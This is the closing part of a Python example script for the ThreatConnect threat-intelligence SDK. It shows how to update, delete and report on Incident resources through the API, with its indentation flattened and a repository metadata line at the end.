print('Error: {0!s}'.format(e))
sys.exit(1)
#
# (Optional) UPDATE RESOURCE EXAMPLE
#
# existing resources can also be updated with the resource add method
    resource = resources.add('MU Incident #{0:d}'.format(rn), owner)  # this will overwrite existing resource name
resource.set_id(mu_id) # set the id to the existing resource
# additional properties can be updated
resource.set_event_date('2015-03-{0:d}T00:00:00Z'.format(randint(1, 30)))
# existing attributes can be loaded for modification or deletion
resource.load_attributes()
for attribute in resource.attributes:
if attribute.type == 'Description':
resource.delete_attribute(attribute.id)
# attributes can be added to the existing resource
resource.add_attribute('Description', 'Manual Update Example #{0:d}'.format(rn))
# existing tags can be loaded for modification or deletion
resource.load_tags()
for tag in resource.tags:
resource.delete_tag(tag.name)
# tags can be added to the existing resource
resource.add_tag('TAG #{0:d}'.format(rn))
# commit this resource and add attributes, tags and security labels
try:
print('Updating resource {0!s}.'.format(resource.name))
resource.commit()
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
#
# (Optional) DELETE RESOURCE EXAMPLE
#
# resources can be deleted with the resource add method
# resource = resources.add(''.format(rn), owner) # a valid resource name is not required
# resource.set_id(dl_id)
#
# # delete this resource
# try:
# resource.delete()
# except RuntimeError as e:
# print(e)
# (Optional) DISPLAY A COMMIT REPORT
print(tc.report.stats)
# display any failed api calls
for fail in tc.report.failures:
print(fail)
if __name__ == "__main__":
main()
sys.exit()
| percipient/threatconnect-python | examples/commit/incidents_commit.py | Python | apache-2.0 | 8,526 | 0.002698 |